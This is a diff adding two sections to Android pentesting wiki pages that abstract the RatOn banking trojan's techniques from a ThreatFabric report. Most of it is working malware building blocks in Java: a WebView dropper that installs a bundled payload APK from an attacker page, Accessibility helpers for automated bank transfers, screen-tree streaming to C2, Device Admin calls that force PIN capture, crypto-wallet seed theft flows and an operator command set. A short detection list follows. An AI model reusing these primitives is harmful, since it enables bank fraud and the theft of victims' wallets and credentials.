The Rise of RatOn From NFC heists to remote control and ATS

src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md

@@ -222,11 +222,177 @@ public void onMessageReceived(RemoteMessage msg){
 
 ---
 
+## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study
+
+The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques.
+
+### Stage-1: WebView → native install bridge (dropper)
+Attackers present a WebView pointing to an attacker page and inject a JavaScript interface that exposes a native installer. A tap on an HTML button calls into native code that installs a second-stage APK bundled in the dropper’s assets and then launches it directly.
+
+Minimal pattern:
+
+```java
+public class DropperActivity extends Activity {
+  @Override protected void onCreate(Bundle b){
+    super.onCreate(b);
+    WebView wv = new WebView(this);
+    wv.getSettings().setJavaScriptEnabled(true);
+    wv.addJavascriptInterface(new Object(){
+      @android.webkit.JavascriptInterface
+      public void installApk(){
+        try {
+          PackageInstaller pi = getPackageManager().getPackageInstaller();
+          PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
+          int id = pi.createSession(p);
+          try (PackageInstaller.Session s = pi.openSession(id);
+               InputStream in = getAssets().open("payload.apk");
+               OutputStream out = s.openWrite("base.apk", 0, -1)){
+            byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
+          }
+          PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
+          pi.commit(id, status.getIntentSender());
+        } catch (Exception e) { /* log */ }
+      }
+    }, "bridge");
+    setContentView(wv);
+    wv.loadUrl("https://attacker.site/install.html");
+  }
+}
+```
+
+HTML on the page:
+
+```html
+<button onclick="bridge.installApk()">Install</button>
+```
+
+After install, the dropper starts the payload via explicit package/activity:
+
+```java
+Intent i = new Intent();
+i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
+startActivity(i);
+```
+
+Hunting idea: untrusted apps calling `addJavascriptInterface()` and exposing installer-like methods to WebView; APK shipping an embedded secondary payload under `assets/` and invoking the Package Installer Session API.
+
+### Consent funnel: Accessibility + Device Admin + follow-on runtime prompts
+Stage-2 opens a WebView that hosts an “Access” page. Its button invokes an exported method that navigates the victim to the Accessibility settings and requests enabling the rogue service. Once granted, malware uses Accessibility to auto-click through subsequent runtime permission dialogs (contacts, overlay, manage system settings, etc.) and requests Device Admin.
+
+- Accessibility programmatically helps accept later prompts by finding buttons like “Allow”/“OK” in the node-tree and dispatching clicks.
+- Overlay permission check/request:
+
+```java
+if (!Settings.canDrawOverlays(ctx)) {
+  Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
+      Uri.parse("package:" + ctx.getPackageName()));
+  ctx.startActivity(i);
+}
+```
+
+See also:
+
+{{#ref}}
+../../mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
+{{#endref}}
+
+### Overlay phishing/ransom via WebView
+Operators can issue commands to:
+- render a full-screen overlay from a URL, or
+- pass inline HTML that is loaded into a WebView overlay.
+
+Likely uses: coercion (PIN entry), wallet opening to capture PINs, ransom messaging. Keep a command to ensure overlay permission is granted if missing.
+
+### Remote control model – text pseudo-screen + screen-cast
+- Low-bandwidth: periodically dump the Accessibility node tree, serialize visible texts/roles/bounds and send to C2 as a pseudo-screen (commands like `txt_screen` once and `screen_live` continuous).
+- High-fidelity: request MediaProjection and start screen-casting/recording on demand (commands like `display` / `record`).
+
+### ATS playbook (bank app automation)
+Given a JSON task, open the bank app, drive the UI via Accessibility with a mix of text queries and coordinate taps, and enter the victim’s payment PIN when prompted.
+
+Example task:
+
+```json
+{
+  "cmd": "transfer",
+  "receiver_address": "ACME s.r.o.",
+  "account": "123456789/0100",
+  "amount": "24500.00",
+  "name": "ACME"
+}
+```
+
+Example texts seen in one target flow (CZ → EN):
+- "Nová platba" → "New payment"
+- "Zadat platbu" → "Enter payment"
+- "Nový příjemce" → "New recipient"
+- "Domácí číslo účtu" → "Domestic account number"
+- "Další" → "Next"
+- "Odeslat" → "Send"
+- "Ano, pokračovat" → "Yes, continue"
+- "Zaplatit" → "Pay"
+- "Hotovo" → "Done"
+
+Operators can also check/raise transfer limits via commands like `check_limit` and `limit` that navigate the limits UI similarly.
+
+### Crypto wallet seed extraction
+Targets like MetaMask, Trust Wallet, Blockchain.com, Phantom. Flow: unlock (stolen PIN or provided password), navigate to Security/Recovery, reveal/show seed phrase, keylog/exfiltrate it. Implement locale-aware selectors (EN/RU/CZ/SK) to stabilise navigation across languages.
+
+### Device Admin coercion
+Device Admin APIs are used to increase PIN-capture opportunities and frustrate the victim:
+
+- Immediate lock:
+
+```java
+dpm.lockNow();
+```
+
+- Expire current credential to force change (Accessibility captures new PIN/password):
+
+```java
+dpm.setPasswordExpirationTimeout(admin, 1L); // requires admin / often owner
+```
+
+- Force non-biometric unlock by disabling keyguard biometric features:
+
+```java
+dpm.setKeyguardDisabledFeatures(admin,
+    DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
+    DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS);
+```
+
+Note: Many DevicePolicyManager controls require Device Owner/Profile Owner on recent Android; some OEM builds may be lax. Always validate on target OS/OEM.
+
+### NFC relay orchestration (NFSkate)
+Stage-3 can install and launch an external NFC-relay module (e.g., NFSkate) and even hand it an HTML template to guide the victim during the relay. This enables contactless card-present cash-out alongside online ATS.
+
+Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay).
+
+### Operator command set (sample)
+- UI/state: `txt_screen`, `screen_live`, `display`, `record`
+- Social: `send_push`, `Facebook`, `WhatsApp`
+- Overlays: `overlay` (inline HTML), `block` (URL), `block_off`, `access_tint`
+- Wallets: `metamask`, `trust`, `blockchain`, `phantom`
+- ATS: `transfer`, `check_limit`, `limit`
+- Device: `lock`, `expire_password`, `disable_keyguard`, `home`, `back`, `recents`, `power`, `touch`, `swipe`, `keypad`, `tint`, `sound_mode`, `set_sound`
+- Comms/Recon: `update_device`, `send_sms`, `replace_buffer`, `get_name`, `add_contact`
+- NFC: `nfs`, `nfs_inject`
+
+### Detection & defence ideas (RatOn-style)
+- Hunt for WebViews with `addJavascriptInterface()` exposing installer/permission methods; pages ending in “/access” that trigger Accessibility prompts.
+- Alert on apps that generate high-rate Accessibility gestures/clicks shortly after being granted service access; telemetry that resembles Accessibility node dumps sent to C2.
+- Monitor Device Admin policy changes in untrusted apps: `lockNow`, password expiration, keyguard feature toggles.
+- Alert on MediaProjection prompts from non-corporate apps followed by periodic frame uploads.
+- Detect installation/launch of an external NFC-relay app triggered by another app.
+- For banking: enforce out-of-band confirmations, biometrics-binding, and transaction-limits resistant to on-device automation.
+
 ## References
 
 - [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign)
 - [Luban – Android image compression library](https://github.com/Curzibn/Luban)
 - [Android Malware Promises Energy Subsidy to Steal Financial Data (McAfee Labs)](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-promises-energy-subsidy-to-steal-financial-data/)
 - [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging)
+- [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
+- [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
 
 {{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md

@@ -146,8 +146,101 @@ The **AccessibilityService** is the local engine that turns those cloud commands
 
 ---
 
+## ATS automation cheat-sheet (Accessibility-driven)
+Malware can fully automate a bank app with only Accessibility APIs. Generic primitives:
+
+```java
+// Helpers inside your AccessibilityService
+private List<AccessibilityNodeInfo> byText(String t){
+  AccessibilityNodeInfo r = getRootInActiveWindow();
+  return r == null ? Collections.emptyList() : r.findAccessibilityNodeInfosByText(t);
+}
+private boolean clickText(String t){
+  for (AccessibilityNodeInfo n: byText(t)){
+    if (n.isClickable()) return n.performAction(ACTION_CLICK);
+    AccessibilityNodeInfo p = n.getParent();
+    if (p != null) return p.performAction(ACTION_CLICK);
+  }
+  return false;
+}
+private void inputText(AccessibilityNodeInfo field, String text){
+  Bundle b = new Bundle(); b.putCharSequence(ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, text);
+  field.performAction(ACTION_SET_TEXT, b);
+}
+private void tap(float x, float y){
+  Path p = new Path(); p.moveTo(x,y);
+  dispatchGesture(new GestureDescription.Builder()
+    .addStroke(new GestureDescription.StrokeDescription(p,0,40)).build(), null, null);
+}
+```
+
+Example flow (Czech → English labels):
+- "Nová platba" (New payment) → click
+- "Zadat platbu" (Enter payment) → click
+- "Nový příjemce" (New recipient) → click
+- "Domácí číslo účtu" (Domestic account number) → focus and `ACTION_SET_TEXT`
+- "Další" (Next) → click → … "Zaplatit" (Pay) → click → enter PIN
+
+Fallback: hard-coded coordinates with `dispatchGesture` when text lookup fails due to custom widgets.
+
+Also seen: pre-steps to `check_limit` and `limit` by navigating to limits UI and increasing daily limits before transfer.
+
+## Text-based pseudo-screen streaming
+For low-latency remote control, instead of full video streaming, dump a textual representation of the current UI tree and send it to C2 repeatedly.
+
+```java
+private void dumpTree(AccessibilityNodeInfo n, String indent, StringBuilder sb){
+  if (n==null) return;
+  Rect b = new Rect(); n.getBoundsInScreen(b);
+  CharSequence txt = n.getText(); CharSequence cls = n.getClassName();
+  sb.append(indent).append("[").append(cls).append("] ")
+    .append(txt==null?"":txt).append(" ")
+    .append(b.toShortString()).append("\n");
+  for (int i=0;i<n.getChildCount();i++) dumpTree(n.getChild(i), indent+"  ", sb);
+}
+```
+
+This is the basis for commands like `txt_screen` (one-shot) and `screen_live` (continuous).
+
+## Device Admin coercion primitives
+Once a Device Admin receiver is activated, these calls increase opportunities to capture credentials and maintain control:
+
+```java
+DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(DEVICE_POLICY_SERVICE);
+ComponentName admin = new ComponentName(this, AdminReceiver.class);
+
+// 1) Immediate lock
+dpm.lockNow();
+
+// 2) Force credential change (expire current PIN/password)
+dpm.setPasswordExpirationTimeout(admin, 1L); // may require owner/profile-owner on recent Android
+
+// 3) Disable biometric unlock to force PIN/pattern entry
+int flags = DevicePolicyManager.KEYGUARD_DISABLE_FINGERPRINT |
+            DevicePolicyManager.KEYGUARD_DISABLE_TRUST_AGENTS;
+dpm.setKeyguardDisabledFeatures(admin, flags);
+```
+
+Note: the exact availability of these policies varies by Android version and OEM; validate the device policy role (admin vs owner) during testing.
+
+## Crypto wallet seed-phrase extraction patterns
+Observed flows for MetaMask, Trust Wallet, Blockchain.com and Phantom:
+- Unlock with stolen PIN (captured via overlay/Accessibility) or provided wallet password.
+- Navigate: Settings → Security/Recovery → Reveal/Show recovery phrase.
+- Collect phrase via keylogging the text nodes, secure-screen bypass, or screenshot OCR when text is obscured.
+- Support multiple locales (EN/RU/CZ/SK) to stabilise selectors – prefer `viewIdResourceName` when available, fallback to multilingual text matching.
+
+## NFC-relay orchestration
+Accessibility/RAT modules can install and launch a dedicated NFC-relay app (e.g., NFSkate) as a third stage and even inject an overlay guide to shepherd the victim through card-present relay steps.
+
+Background and TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay
+
+---
+
 ## References
 * [PlayPraetor’s evolving threat: How Chinese-speaking actors globally scale an Android RAT](https://www.cleafy.com/cleafy-labs/playpraetors-evolving-threat-how-chinese-speaking-actors-globally-scale-an-android-rat)
 * [Android accessibility documentation – Automating UI interaction](https://developer.android.com/guide/topics/ui/accessibility/service)
+* [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
+* [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
 
 {{#include ../../banners/hacktricks-training.md}}